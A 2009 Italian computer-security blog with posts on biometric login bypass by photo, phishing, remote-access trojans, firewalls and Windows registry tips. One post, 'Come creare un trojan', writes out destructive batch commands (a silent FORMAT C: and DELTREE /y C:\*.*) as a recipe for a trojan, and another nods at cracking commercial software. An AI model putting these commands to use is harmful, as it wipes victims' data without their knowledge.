domenica 31 maggio 2009

Ma la biometria è davvero così sicura?

E' stato accolto come un sistema di sicurezza avanzatissimo, il migliore: parliamo del riconoscimento biometrico e... del suo flop.
La notizia arriva dalla Hanoi University of Technology dove alcuni ricercatori hanno dimostrato, durante una conferenza, come farsi beffe delle videocamere biometriche installate su alcuni computer portatili di ultima generazione e, peraltro, molto costosi sia un gioco da ragazzi...o quasi. Uno scanner biometrico analizza le caratteristiche del volto che si trova davanti all'obbiettivo estrapolandone caratteristiche uniche, e permettendo alla persona una volta riconosciuta di accedere al sistema operativo. I sistemi di riconoscimento del volto presenti sui laptop dotati di webcam si basano su software che dopo aver scansionato tramite la webcam il volto della persona che vi si pone davanti, confrontano poi le informazioni con quelle in archivio per sbloccare la macchina e autenticare l'utente all'uso del sistema operativo.
L'unico problema, per ora, è rappresentato dal fatto che questi ricercatori sono riusciti a dimostrare che per superare questa "sicurezza" basta porre davanti alla camera ...una foto a colori del proprietario del pc!! Proprio così: la videocamera non è in grado di distinguere le immagini dai volti "veri" delle persone!

Basta modificare opportunamente le fonti di illuminazione e l'angolo di ripresa della scena in foto, hanno scoperto i ricercatori, per turlupinare una tecnologia spacciata come "sicura" e "a prova di hacker". Considerata l'enorme quantità di immagini sui portali "sociali" come Facebook e MySpace e i programmi di fotoritocco (anche gratuiti) disponibili, sottolineano i ricercatori, ipotizzare un attacco di questo genere è un'idea tutt'altro che peregrina. Il punto debole di questa tecnologia sarebbero proprio gli algoritmi di riconoscimento su cui si basa: questi sono tarati per lavorare con immagini già digitalizzate e post-processate, e ciò, invece di aumentare la sicurezza, non fa altro che renderla molto più debole e aggirabile.
Una bella fregatura per aziende come Lenovo, Asus e Toshiba che spacciano la biometria facciale per garanzia di assoluta sicurezza!
E' proprio il, caso di dire che la biometria ha...perso la faccia!!
Come sempre, la migliore difesa contro i malintenzionati è il buonsenso...

Salvare l'insalvabile, stampare l'instampabile...ma attenzione al copyright

Vi sarà capitato, almeno una volta, di voler salvare un immagine dal web oppure di voler stampare qualcosa, ma di non esserci riusciti perchè il sito non vi consentiva si salvare l'immagine oppure di stampare la pagina. In realtà c'è un piccolo trucco per ovviare a tutto questo: visualizzate quello che vi interessa, quindi premete il tasto "Stamp", poi aprite Paint e fate "CTRL + V" (incolla): ecco che apparirà quello che visualizzavate sul vostro desktop quando avete premuto il tasto "Stamp". A questo punto con gli strumenti di Paint potete tagliare ciò che volete e incollare il tutto su un nuovo foglio di Paint e quindi salvare l'immagine come jpg o bitmap. Ora, se volete, potete anche stampare!

Fonte:
http://cyph3r75.giovani.it/diari/2805239/salvare_linsalvabile_e_stampare_linstampabile.html

CDBurnerXP, un software per masterizzare gratuito

Avete terminato il periodo di prova di Nero e vi sbattete alla ricerca del crac (su su, siamo sinceri... mica siamo all'asilo) o di come sostituirlo egregiamente? Vi suggerisco CDBurnerXP, un programma leggero, efficace e... gratuito. Ha un'interfaccia utente che ricorda da vicino quella del famoso Nero Burning Rom.

Compatibile con Windows 2000, Windows XP e Windows Vista, CDBurnerXP supporta tutti i principali masterizzatori oltre che le tecnologie Just Link, Burn Proof e PowerBurn.
Consente di creare CD e DVD multisessione, di masterizzare immagini ISO, supporta la cancellazione e la successiva riscrittura di CD/DVD re-writable, permette di creare Audio CD con o senza pause tra una traccia e l'altra.

L'autore di CDBurnerXP raccomanda di disinstallare qualsiasi precedente versione eventualmente presente sul vostro sistema prima di avviare il setup dell'ultima release.


Se non siete particolarmente esigenti e quello che vi serve è un programma per masterizzare, questo potrebbe fare al caso vostro.

Il sito ufficiale del programma è:
http://cdburnerxp.se/it/download

Splashup ovvero un mini PhotoShop free online

Se siete dei viaggiatori oppure dei designer bisognosi di modificare al volo le vostre immagini, Splashup (www.splashup.com) è quello che fa per voi. Si tratta di uno dei migliori editor di immagini via web - insieme con Picnik, Pixoh e Resizr. In pratica permette di elaborare immagini direttamente dal proprio browser.

Ricco di funzioni professionali, va bene anche per i dilettanti essendo molto semplice da usare. Quello che stupisce di Splashup è la sua somiglianza sorprendente con Photoshop! E’ in tutto e per tutto simile a Photoshop: gli stumenti e le palette sono disposti nella stessa posizione. perfino le icone, il selettore dei colori e la gestione dei layer è identica. E’ però un’applicazione web. Tra i suoi pregi: può elaborare più immagini contemporaneamente, lavora in real-time ed è completamente cross-browser. Sfrutta il fatto di essere web per integrare perfettamente la comunicazione con altri siti di fotografia come Flickr, Facebook e Picasa. Per non parlare poi della possibilità di applicare filtri, di gestire brush e gli effetti sui layer.


Fonte:
http://www.towerlight2002.net/2007/11/18/splashup-%E2%80%98mini-photoshop%E2%80%99-free-online-image-editor/

Un virus cripta i file e chiede il riscatto

E' successo il mese scorso a un professionista sassarese che doveva brevettare un progetto. Andato ad accendere il pc, si è ritrovato tutti i documenti criptati e un messaggio: «Se vuoi sbloccare i tuoi file devi pagare 900 euro». Il virus che cifra i file e chiede il riscatto si chiama «Krypt.cz» o «Gpcode.ak» e si diffonde tramite posta elettronica. Non si tratta di una novità: Krypt.cz è una variante di un troian in circolazione già da alcuni anni, ma la nuova versione utilizza una chiave di criptazione simile a quella usata dalle banche per proteggere i dati su Internet.

Fonte:
http://www.towerlight2002.net/2009/05/16/un-virus-cripta-i-file-e-chiede-il-riscatto/

sabato 30 maggio 2009

Anche Steve Jobs vittima del phishing

Pare che rubare a Steve Jobs, il papà di Apple, i dati di accesso al suo account Amazon, sia stato più semplice che rubare una caramella a un bambino. L'esca semplicissima: un messaggio inviato via e-mail!
A rivendicare l'impresa è stato un hacker, "orin0co", che dopo aver curiosato tra le pagine ha diffuso screenshot e informazioni relative alle attività condotte da Jobs all'interno del sito di e-commerce rivelando dettagli su ordini e acquisti degli ultimi anni. Si è così scoperto che il signor Apple avrebbe (il condizionale è d'obbligo visto che Apple non ha commentato la notizia, mentre Amazon ha detto di non essere a conoscenza di alcuna violazione) effettuato circa 20 mila ordini negli ultimi 10 anni: roba da far impallidire anche celebri shopping-addicted come Michael Jackson e Paris Hilton. Tra gli articoli acquistati di recente, un lettore Blu-ray e una copia di The Nuclear Express, un libro sulla storia della bomba atomica. Tuttavia, l'aspetto più curioso della vicenda (qualora fosse confermata) risiede nel fatto che anche un genio dell'hi-tech come Steve Jobs può cadere vittima del phishing.

Fonte:
http://www.visionpost.it/dlife/violato-laccount-amazon-di-mr-apple.htm
Alessandra Carboni, Valentina Evelli

binary over JPEG ossia come inserire un trojan in un'immagine JPEG


Il "binary over jpeg" è il meccanismo che nasconde un trojan horse in un'immagine JPEG e che viene attivato dall'utente nel momento in cui scarica l'immagine.
Molti prodotti Microsoft, inclusi i programmi della suite Office, Internet Explorer, Windows XP e Windows Server 2003, utilizzano un file DLL (dynamic link library) chiamato GDIPlus.dll. Contiene librerie per l'API GDI+ (Graphical Device Interface Plus). Questo permette ai programmatori di rappresentare gli oggetti grafici e trasmetterli a dispositivi d'output, come monitor e stampanti. Questa DLL permette di processare immagini JPEG. Purtroppo, il modo in cui gestisce le immagini JPEG può provocare un buffer overflow.
Per sfruttare la vulnerabilità, chi compie l'attacco ha bisogno soltanto che la vittima visualizzi l'immagine JPEG camuffata. Questo file è tipicamente inviato all'interno di un messaggio email HTML o visualizzato su un sito Web. L'immagine JPEG può anche essere contenuta in un file Word, PowerPoint o in un altro documento di Microsoft Office. Una volta visualizzata, il codice trojan horse contenuto verrà eseguito sul sistema infetto con i privilegi dell'applicazione che ha aperto il file JPEG. Questa vulnerabilità, annunciata a settembre 2004, a causa della sua gravità ha richiesto da parte della Microsoft una patch dedicata

Fonte:
http://searchsecurity.techtarget.it/01NET/HP/0,1254,18_ART_77088,00.html?lw=19

Cosa fare se ricevi un messaggio di posta elettronica sospetto

1. Se pensi di aver ricevuto un messaggio di phishing, non rispondere.

2. Segnala i messaggi di posta elettronica sospetti.

Segnala i messaggi di posta elettronica all'organizzazione che è stata oggetto di contraffazione o "spoofing".
Contatta direttamente l'azienda (non tramite il messaggio ricevuto) e chiedi conferma. Se preferisci, chiama l'eventuale numero verde dell'azienda per parlare con un rappresentante dell'assistenza clienti. È inoltre utile segnalare la frode alle autorità competenti (Polizia Postale).

3. Non utilizzare i collegamenti contenuti all'interno dei messaggi di posta elettronica.

I collegamenti contenuti nei messaggi di posta elettronica invi

ati per frodare gli utenti conducono spesso a falsi siti Web che invitano alla trasmissione di informazioni personali o finanziarie che verranno poi trasmesse all'autore della frode. Evita di fare clic su un collegamento contenuto in un messaggio di posta elettronica se non sei certo dell'autenticità del messaggio. Anche se la barra degli indirizzi visualizza l'indirizzo corretto, non rischiare di farti ingannare. Gli esperti di contraffazione conoscono molti modi per visualizzare un falso URL nella barra degli indirizzi del browser.

4. Digita gli indirizzi direttamente all'interno del browser o utilizza i segnalibri personali.

5. Prima di immettere dati personali o finanziari in un sito Web, verifica il certificato di protezione.

Prima di immettere i dati, controlla che il sito sia protetto. A tale scopo, in Internet Explorer controlla che sulla barra di stato sia presente l'icona del lucchetto giallo

L'icona del lucchetto chiuso indica che il sito Web protegge i dati riserv

ati immessi dagli utenti, come il numero di carta di credito, il codice fiscale o i dati di pagamento, mediante crittografia. Il simbolo del lucchetto non compare in tutte le pagine del sito, ma solo in quelle in cui vengono immesse informazioni personali. Tenere presente che anche il simbolo del lucchetto è oggetto di contraffazione. Per maggiore garanzia di protezione, fai doppio clic sull'icona del lucchetto per visualizzare il certificato di protezione del sito. Il nome visualizzato dopo Rilasciato a dovrebbe corrispondere al nome del sito. Se il nome è diverso, il sito potrebbe essere falsificato. Se non sei sicuro che il certificato visualizzato sia autentico, non immettere alcuna informazione personale. Evita ogni rischio ed esci dal sito Web.

Suggerimento: se la barra di stato in fondo alla finestra del browser non è visibile, fare clic su Visualizza in alto nel browser, quindi selezionare Barra di stato per attivarla.

6. Non immettere informazioni personali o finanziarie nelle finestre popup.

Una diffusa tecnica di phishing consiste nel lanciare una falsa finestra popup quando un utente fa clic sul collegamento contenuto all'interno del messaggio illegittimo. Per rendere la finestra popup ancora più convincente, questa potrebbe essere sovrapposta alla finestra di un sito attendibile. Anche se la finestra popup sembra autentica o in essa si afferma che è protetta, evita di immettere informazioni riservate in quanto non è possibile verificare il certificato di protezione. Chiudi le finestre popup facendo clic sulla X rossa nell'angolo in alto a destra (il pulsante "annulla" potrebbe non funzionare nel modo atteso).

7. Utilizza prodotti e servizi aggiornati in grado di assicurare protezione dalle frodi online.

Installa le versioni più recenti dei programmi di posta elettronica dotati di funzionalità di protezione dalla posta indesiderata e dal phishing



Installa software antivirus e antispyware aggiornati. Alcuni messaggi contraffatti contengono software dannoso o indesiderato in grado di tener traccia delle tue attività o semplicemente di rallentare le prestazioni del computer

8. Aggiorna il software del computer.



Fonte:
http://www.microsoft.com/italy/athome/security/email/phishingdosdonts.mspx

Come proteggersi dai RAT?

1.
Stabilire comunicazioni online sicure. Comunicare l'indirizzo di posta elettronica principale solo a persone conosciute.

Evitare di inserire l'indirizzo di posta elettronica negli elenchi internet e nei servizi di offerta di lavoro sul web.

Non aprire allegati contenuti nei messaggi di posta elettronica e nei messaggi immediati a meno che non sia stata verificata la natura e la provenienza

2.
Utilizzare software affidabile creato da aziende attendibili. Internet offre una grande varietà di software che garantiscono massimo divertimento e funzionalità utili gratuitamente o a prezzi estremamente contenuti. Ma il prezzo da pagare, a volte, è legato al malware nascosto all'interno di questi programmi.

Controllare attentamente prima di eseguire, scaricare o utilizzare software provenienti da fonti non conosciute o attendibili

3.
Utilizzare un firewall

4.
Aggiornare costantemente il computer

5.
Utilizzare il software antivirus e aggiornarlo costantemente

6.
Utilizzare il software antispyware e aggiornarlo costantemente

Fonte:
http://www.microsoft.com/italy/athome/security/viruses/remote_access_trojans.mspx

Cos'è in grado di fare un RAT?

Un RAT fornisce il controllo remoto di un computer attraverso la connessione Internet. I malintenzionati possono utilizzare tale possibilità per:

Attuare delle frodi. Alcuni programmi RAT possono mascherare un sito Web contraffatto in modo che sembri un sito Web attendibile (ad esempio un sito di banking online). Le password e le altre informazioni inserite nel sito contraffatto possono essere utilizzate per furti di denaro e d'identità.

Trovare i file personali e visualizzarli, copiarli, modificarli o eliminarli. I RAT possono essere programmati in modo da eseguire queste operazioni una sola volta oppure ogni volta che il computer viene riavviato.

Registrare le informazioni inserite e inviarle a un altro computer. I malintenzionati elaborano tali informazioni tramite software speciali e ne ricavano i nomi utenti e le password immesse sul computer.

Acquisire video e audio dalle periferiche collegate al computer, salvare i supporti come file e inviarli ai computer dei malintenzionati.

Eseguire o terminare un programma, processo o connessione sul computer.

Creare popup che vengono visualizzati sullo schermo per invogliare l'utente a collegarsi a siti Web contraffatti.

Attaccare altri computer. Alcuni RAT vengono utilizzati allo scopo di creare eserciti di zombie, cioè gruppi di computer di grandi dimensioni controllati da malintenzionati per l'esecuzione di attività, quali il sovraccarico di server con messaggi o la diffusione di virus o spyware.

Fonte:

http://www.microsoft.com/italy/athome/security/viruses/remote_access_trojans.mspx

Cos'è un RAT?

I RAT sono Trojan di accesso remoto, programmi malware che consentono ai malintenzionati di prndere il controllo del pc attraverso la connessione Internet.

Tramite un RAT, un malintenzionato è in grado di visualizzare e modificare i file e le funzioni del computer, di controllare e registrare le attività eseguite e di utilizzare il computer per attaccare altri computer a insaputa della vittima.

Fonte:

http://www.microsoft.com/italy/athome/security/viruses/remote_access_trojans.mspx

Come creare un trojan

Un trojan horse è un programma maligno che può arrivare anche a cancellare tutto il contenuto del disco fisso. Esistono diverse specie di Trojan. Una di queste sono i BAT-TROJAN HORSE, cioè trojan in formato “.bat”.

Realizzarlo è molto semplice:

Aprite un qualsiasi editor di testo (ad esempio notepad) e salvate il documento col nome che più vi piace e assegnandogli estensione .bat

Poi al suo interno scrivete:

C:\>EDIT TROJAN1.BAT
@FORMAT C: /AUTOTEST

oppure

C:\>EDIT TROJAN2.BAT
@DELTREE /y C:\*.*

.

Il carattere @ serve a nascondere l’echo su schermo del comando ed è utile per impedire all'utente di accorgersi di cosa succede..

L'utilizzo del parametro /AUTOTEST del comando FORMAT permette l'esecuzione immediata della formattazione del disco senza che venga visualizzata la schermata che chiede all’utente di ripensarci, prima di avviare la formattazione:

ATTENZIONE: TUTTI I DATI SUL DISCO FISSO C: ANDRANNO PERSI

Continuare con la formattazione (S/N)?

Stessa cosa per il comando DELTREE, che combinato con l’opzione /y rimuove tutti i files e tutte le cartelle dal disco C.

.Varianti simili si possono ottenere con il normale comando DEL del DOS.


Fonte:

http://raffaelemorra.altervista.org/come-creare-un-trojan-horse/

autore: Raffaele Morra

venerdì 29 maggio 2009

Social Network e conservazione a scadenza dei dati sensibili

Il fenomeno dei social network spinge molti utenti a lasciare tracce dei propri dati sensibili sul Web.

Viktor Mayer-Schönberger, esperto di sicurezza dei media e docente all’università di Harvard sostiene la necessità della conservazione dei dati sensibili solo per un periodo di tempo limitato, trascorso il quale i dati personali sul Web dovrebbero cancellarsi automaticamente. In questo modo le informazioni sarebbero più protette, perché non reperibili sempre e da chiunque e l’utente in questo modo, sapendo che i suoi dati verranno cancellati dopo un certo periodo, potrebbe decidere in modo più consapevole se fornirli tutti o in parte.

Per esempio Google conservava i dati relativi all’utente fino al 2038. Poi in seguito all’intervento dei garanty della privacy questa pratica è stata modificata: adesso i cookie che conservano i dati sensibili vengono conservati solo per 18 mesi.

Il fatto è che molti social network basano il loro business sull'utilizzo dei dati personali forniti dai loro utenti.

Spesso tra l’altro gli utenti non conoscono le procedure che possono adottare per proteggere la loro privacy nell’uso dei social network. Essi possono chiedere la cancellazione dei propri dati e - in casi estremi - chiedere anche un risarcimento dei danni, quando le regole non vengono rispettate.

A questo proposito il gruppo di lavoro per la tutela dei dati personali dell’Unione Europea in una specifica direttiva ha stabilito che il limite di tempo per la conservazione dei dati sensibili degli utenti è di sei mesi.

Fonte:

http://www.oneitsecurity.it/28/11/2008/social-network-e-dati-sensibili/

Chi ha inventato il primo computer?

A dispetto di tutti coloro che credono che fu l`ENIAC, costruito dagli americani nel 1946, il primo computer della storia, in realtà il primo computer è stato inventato dagli inglesi durante la seconda guerra mondiale. Lo scopo di questa macchina era quello di decifrare i messaggi segreti dei tedeschi. Le decifrazioni di questo arcaico computer furono determinanti per la vittoria finale.


scareware

Messaggi che ci invitano ad acquistare finti software per risolvere falsi problemi di sicurezza

Come funziona l'editor del registro di sistema?

La finestra dell'editor del registro di sistema è divisa verticalmente in due riquadri: quello di sinistra contiene i vari "rami" del registro di sistema, mentre quello di destra presenta il contenuto del ramo selezionato nel riquadro di sinistra. Come tutte le applicazioni tradizionali di Windows c'è una barra dei menu (nella parte superiore della finestra) e una barra di stato(nella parte inferiore della finestra) che visualizza il nome completo dell'elemento correntemente selezionato.



Per muoversi ai vari livelli di profondità delle chiavi del registro si utilizzano i triangolini a sinistra delle voci. Nel primo livello della gerarchia di chiavi del registro, il triangolo è bianco. Quando si clicca su di esso si trasforma in un triangolo nero che punta in basso a destra, verso le nuove opzioni che si sono aperte. Cliccando nuovamente su questo triangolo nero si richiude la gerarchia appena aperta: un clic sul triangolo bianco per aprire una gerarchia, un clic sul triangolo nero per richiuderla. Gli elementi rappresentati nel riquadro a sinistra sono detti nodi. Ogni nodo può contenere uno o più sottonodi e una o più chiavi

Come si richiama l'editor del registro di sistema?

Windows XP
Digitare regedit (il nome dell'Editor del registro di sistema) nella finestra Esegui richiamabile dal menu Start

Vista
digitare regedit (il nome dell'Editor del registro di sistema) nella casella Inizia ricerca nel menu Start.




Comparirà la finestra del Controllo dell'account utente. L'editor del registro di sistema infatti è un programma per molti versi pericoloso perchè permette di mettere le mani su tutti gli aspetti più delicati per il funzionamento del sistema. Quando lo si richiama Vista la considera una richiesta potenzialmente pericolosa e dunque chiede all'utente l'autorizzazione a proseguire. Cliccate su Continua. Si aprirà a questo punto la finestra dell'editor del registro

giovedì 28 maggio 2009

Come sapere se si e' stati infettati da un worm

Con un sistemino molto semplice e' possibile sapere se siamo stati infettati da un virus di tipo “worm”.
Aprite Outlook Express (o il vostro client di posta elettronica), inserite un nuovo contatto e scrivete nello spazio nome: 00000. Essendo un contatto inesistente, se venissimo infettati da un virus worm che si autoinvia ai vostri contatti, riceveremmo una mail di errore e sapremmo che dobbiamo ripulirci.

Fonte:
http://leotardi.no-ip.com/html/registro.htm

Eliminare le ToolBar invadenti

Nel registro di sistema andate in:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ToolBar
Nel pannello a destra controllate le diverse toolbar presenti, selezionate quella sgradita ed eliminatela. Lanciate IExplorer e la barra dovrebbe essere scomparsa.

Vedere i programmi in esecuzione automatica sul computer

Dentro a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
troviamo tutti i programmi che si avviano in automatico all'avvio di Windows

Fonte:
http://leotardi.no-ip.com/html/registro.htm

Disabilitare il prompt dei comandi e i file Batch

E' possibile disabilitare l'utilizzo diretto del prompt dei comandi e l'esecuzione dei file batch (quelli con estensioni .bat).
Aprire il file di registro e andare su
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
Se non esiste la chiave, createla. All'interno di System create un nuovo valore DWORD (Modifica - Nuovo - Valore DWORD) e assegnate il nome "DisableCMD" (senza virgolette), quindi impostate il suo valore dati come segue:
0 (default) il prompt è abilitato
1 disabilita il prompt dei comandi e l'esecuzione dei file batch
2 disabilita il prompt ma non l'esecuzione dei file batch
Dopo questa modifica, si aprirà la finestra del prompt dei comandi con l'informazione "Il prompt dei comandi è stato disabilitato dall'amministratore. Premere un tasto per continuare".

Fonte:
http://leotardi.no-ip.com/html/registro.htm

Dove si trova il registro di sistema?

Sebbene il Registro sia generalmente considerato una singola entità, in realtà il suo contenuto è memorizzato fisicamente in più file da Microsoft chiamati hive per analogia con la struttura a celle degli alveari (in inglese beehive).Gli hive sono contenuti per lo più nella cartella System32\Config della directory di Windows e sono riconoscibili dai nomi Default, Sam, Security e System più i rispettivi file .log; gli hive di ogni profilo utente (Ntuser.dat e il suo .log) sono contenuti nelle corrispondenti sottodirectory di Windows, solitamente \Documents and Settings\nomeutente.


Fonte:

http://leotardi.no-ip.com/html/registro.htm


Registro di sistema

Il registro di sistema di Windows è un database gerarchico nel quale sono memorizzate ed aggiornate informazioni importanti per il corretto funzionamento del sistema operativo. Le informazioni riguardano il software installato, periferiche hardware in uso, preferenze scelte dai vari utenti, impostazioni varie di sistema, e molto altro.

Il Registro di sistema contiene informazioni a cui il sistema operativo fa continuamente riferimento mentre viene utilizzato, quali i profili di tutti gli utenti, le applicazioni installate nel computer e i tipi di documenti creati da ciascuna applicazione, le impostazioni delle finestre delle proprietà per cartelle e icone delle applicazioni, i componenti hardware presenti nel sistema e le porte in uso...

I dati del Registro di sistema sono memorizzati in file binari.

Il Registro di sistema è modificabile utilizzando l'editor del Registro di sistema (Regedit.exe o Regedt32.exe).
L'errato utilizzo dell'editor del Registro di sistema può causare problemi al sistema che nei casi più gravi potrebbero causare la necessità di reinstallazione del sistema operativo.

Che differenza c'è tra l'utilità di ripristino configurazione sistema e il ripristino manuale del registro in precedenza salvato da Regedit ?

Che differenza c'è tra l'utilità di ripristino configurazione sistema e il ripristino manuale del registro di Windows in precedenza salvato da Regedit - esporta file del registro di configurazione (intervallo di esportazione = tutto)?
La prima utility ripristina sia le configurazioni del sistema che il registro; tramite la seconda è possibile ripristinare SOLO il registro e non, ad esempio, files e impostazioni.

Come avviare lo strumento Ripristino configurazione di sistema da un prompt dei comandi

In Windows XP è disponibile lo strumento Ripristino configurazione di sistema, che tuttavia non può essere avviato da un prompt della console di ripristino. Per questo motivo, può essere utile avviare lo strumento Ripristino configurazione di sistema quando il computer non può essere avviato normalmente o in modalità provvisoria.

Per avviare lo strumento Ripristino configurazione di sistema quando non è possibile avviare normalmente o in modalità provvisoria il computer che esegue Windows XP, modificare temporaneamente la shell di Windows da Explorer.exe a Progman.exe:
  1. Avviare il computer in modalità provvisoria con prompt dei comandi.

    NOTA: è necessario accedere al computer come amministratore o come utente con diritti di amministratore.
  2. Al prompt dei comandi digitare regedit e premere INVIO.
  3. Visualizzare la seguente chiave del Registro di sistema:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
  4. Nel riquadro destro fare clic con il pulsante destro del mouse su Shell, quindi scegliere Modifica.
  5. Cambiare la voce Explorer.exe in Progman.exe, quindi scegliere OK.
  6. Scegliere Esci dal menu File.
  7. Al prompt dei comandi digitare shutdown -r e premere INVIO per riavviare il computer.
  8. Accedere al sistema come amministratore o come utente con diritti di amministratore.
  9. Quando viene avviato Program Manager, scegliere Esegui dal menu File, digitare c:\windows\system32\restore\rstrui.exe e premere INVIO.
  10. Seguire le istruzioni che verranno visualizzate per ripristinare il computer a un precedente stato funzionale.
Fonte:
http://support.microsoft.com/kb/304449/it

Quanto è grande il registro di sistema?

Le dimensioni del registro di sistema dipendono dalla quantità di applicazioni installate sul sistema stesso: pù sono queste e maggiori, in linea di massima, saranno le dimensioni del registro di sistema. Infatti ogni volta che si installa un'applicazione sul pc, questa interviene sul registro di sistema inserendovi le proprie impostazioni. Questo, in senso assoluto, non rappresenta un problema grave, tuttavia espone il registro a un problema: maggiori saranno le dimensioni del registro di sistema, maggiore sarà il rallentamento del sistema perchè ogni volta che il sistema operativo dovrà esaminare il contenuto del registro (operazione che si ripete migliaia di volte nel corso di una giornata), dovrà intervenire su un file di grandi dimensioni.

Finestre di dialogo e registro di sistema

Le finestre di dialogo sono lo strumento di Windows per dare informazioni o per permettere all'utente di personalizzare il sistema semplicemente scegliendo tra diverse opzioni. Le modifiche delle impostazioni che effettuiamo attraverso le finestre di dialogo sono in realtà modifiche che apportiamo direttamente sui file del registro di sistema. Anche se l'utente non se ne rende conto, ogni volta che modifica un'impostazione di un'applicazione in una finestra di dialogo è come se aprisse il registro di sistema e modificasse un valore. L'utilizzo delle finestre di dialogo serve a Windows per:
- evitare all'utente di dover intervenire sulle opzioni di sistema in modo troppo "manuale";
- evitare all'utente di doversi preoccupare di intervenire su valori strani dai nomi misteriosi senza apparente significato, come tali manipolabili solo da addetti ai lavori;
- proteggere il sistema e l'utente da eventuali errori di configurazione che potrebbero comportare il peggioramento delle prestazioni del sistema, provocare potenziali problemi di sicurezza e, nella peggiore delle ipotesi, pregiudicare il funzionamento stesso del sistema operativo

Apportate modifiche al registro di sistema sempre con la massima cautela e solo se sapete ciò che state facendo

Il registro di sistema è il luogo dove vengono memorizzate tutte le impostazioni del sistema. E' per il sistema operativo ciò che per un'automobile è il motore. Un'oggetto estremamente delicato, che possiamo regolare, modificare, elaborare ma sempre con la massima attenzione e cautela in quanto agendo su di esso in maniera sconsiderata si può pregiudicare il funzionamento dell'intero computer e portare, nei casi più gravi, alla necessità di formattare e reinstallare tutto!! Personalizzare il registro di sistema permette di ottenere un sistema più adatto alle nostre esigenze, più comodo, più veloce e magari più sicuro. Mettere le mani sul registro di sistema senza la dovuta esperienza, o peggio a casaccio, è come aprire il cofano della nostra automobile e mettersi a giocare con le regolazioni, le centraline, le mappature e così via: il risultato sarà un'automobile inguidabile, inaffidabile o addirittura pericolosa. La stessa cosa accade in un computer. Perciò mi raccomando: mettete le mani sul registro di sistema solo se sapete... dove mettere le mani!!

Dove vengono memorizzate tutte le impostazioni che modifichiamo sul sistema?

Ogni volta che personalizziamo il sistema operativo - ad esempio scegliendo un nuovo sfondo o uno dei tanti screen saver offerti da Windows o una combinazione di suoni, modificando la risoluzione dello schermo, modificando un'impostazione di Internet Explorer, di Windows Media Player o di qualsiasi altra applicazione di sistema o anche aggiunta successivamente (ad esempio i programmi del pacchetto Office) - per ogni personalizzazione il sistema adotta specifiche configurazioni interne che vengono memorizzate nel registro di sistema, un'enorme database di centinaia di voci a ciascuna delle quali corrisponde un valore. Quando noi compiamo una qualsiasi delle operazioni di personalizzazione sopra citate lo facciamo utilizzando le apposite finestre di configurazione richiamabili da Pannello di controllo o comunque dai menu dell'applicazione che si vuol configurare. In realtà in quel momento il programma che stiamo configurando apre i file del registro di sistema per modificarvi un valore. L'utente non se ne accorge, pensa di stare intervenendo sulle impostazioni di un'applicazione in una finestra di dialogo. In realtà sta intervenendo sui file del registro di sistema

Che bisogno ho del firewall se ho già un buon antivirus?

La protezione da virus e spyware fornita da antivirus e antispyware non assicura il pc contro accessi diretti da parte di hacker. Fare assegnamento esclusivamente su Antivirus/Antispyware è come cacciare fuori da casa vostra uno svaligiatore invece di mettere un catenaccio a ogni porta. Lo scopo primario deve essere non quello di scacciare gli svaligiatori ma quello di non lasciarli entrare affatto. Inoltre un software antivirus/antispyware altro non è che una lista di definizioni di virus tra quelli scoperti più recentemente. Però allora è un dato di fatto che gli hackers vincano sempre in un senso: per definizione infatti, la lista è una REAZIONE a un'infezione già avvenuta. Come detto, l'obiettivo deve essere innanzitutto quello di non prendere un'infezione. Trasportando questo ragionamento sul piano medico, si può dire che antivirus/antispyware sono la cura, il firewall è la prevenzione. E si sa: prevenire è meglio che curare!!

Fonte.
http://www.zonealarm.com/security/it/firewall/need-firewall.htm

Che cosa è un firewall? Perchè ho bisogno di un firewall?

Un firewall è la prima e l'ultima linea difensiva del tuo pc.

Voi non lo vedete, ma quando siete connessi a internet, il vostro pc diventa il crocevia di un intenso traffico di rete in entrata e in uscita. Questo traffico avviene attraverso buchi chiamate porte

Da una parte queste porte permettono il download delle vostra musica o la navigazione sui vostri siti preferiti. Tuttavia nel contempo espongono il computer agli attacchi dei programmi maligni. Un firewall è un'armata personale a sorveglianza di queste porte. Il firewall deve vigilare su tutto il traffico in entrata e in uscita dalle porte e saper distinguera tra il traffico buono tra il traffico buono che l'utente vuole far entrare e il traffico cattivo che invece vuole tener fuori.

Un firewall è fondamentale per la sicurezza di un computer. Un computer senza firewall è come una banca che lavora a porte aperte e senza cassaforte. Informazioni bancarie, passwords, numeri di carta di credito, virtualmente qualsiasi informazione sensibile presente sul computer diviene disponibile per i malintenzionati, che possono entrare nel pc, prendere ciò che vogliono e persino lasciare sul pc una backdoor per continuare gli accessi al vostro computer ogni qualvolta lo desiderano.

In poche parole, il firewall è l'unico modo per bloccare accessi esterni al vostro computer

Fonte

http://www.zonealarm.com/security/it/support/why-need-firewall-anti-virus-spyware.htm

http://www.zonealarm.com/security/it/firewall/need-firewall.htm

mercoledì 27 maggio 2009

Come disattivare le funzionalità inutili di Vista

Windows Vista viene automaticamente installato con molte funzionalità, non sempre utili per l'uso che facciamo del nostro computer. Per ottimizzare il sistema conviene disabilitare le funzionalità che non utilizziamo. Ecco come si fa.

In Pannello di controllo scegliere Programmi e funzionalità.

Nella finestra che si apre cliccare su Attivazione o disattivazione delle funzionalità Windows

Si apre una finestra contenente l'elenco delle funzionalità Windows. Per disattivare una funzionalità basta togliere il segno di spunta dalla relativa casella accanto alla funzionalità da disabilitare. Ad esempio se non si ha un Tablet PC si possono disabilitare i componenti relativi al Tablet PC

SpeedFan e il monitoraggio delle temperature di processore, dischi rigidi, scheda madre e scheda video

SpeedFan è un programmino freeware che permette di monitorare le temperature, la tensione di alimentazione e la velocità delle ventole all'interno del computer. Il software è in grado di controllare costantemente ed in tempo reale i dati relativi a dischi rigidi, scheda madre, processore e scheda video.

Vista, riprogrammare il pulsante di accensione del computer

Quando premete il pulsante di accensione del vostro pc, Windows entra in modalità di sospensione ma noi invece vogliamo che esso venga chiuso e l'apparecchio si spenga? E' possibile programmare il pulsante di accensione del nostro pc specificando cosa vogliamo faccia Windows quando lo premiamo. Da Pannello di controllo scegliamo Opzioni risparmio energia.



Nella colonna a sinistra della finestra che si apre, clicchiamo su Specifica comportamento pulsanti di alimentazione.



Si apre una finestra in cui, tramite menu a tendina, è possibile specificare l'azione che deve compiere il pc quando viene premuto il pulsante di alimentazione.



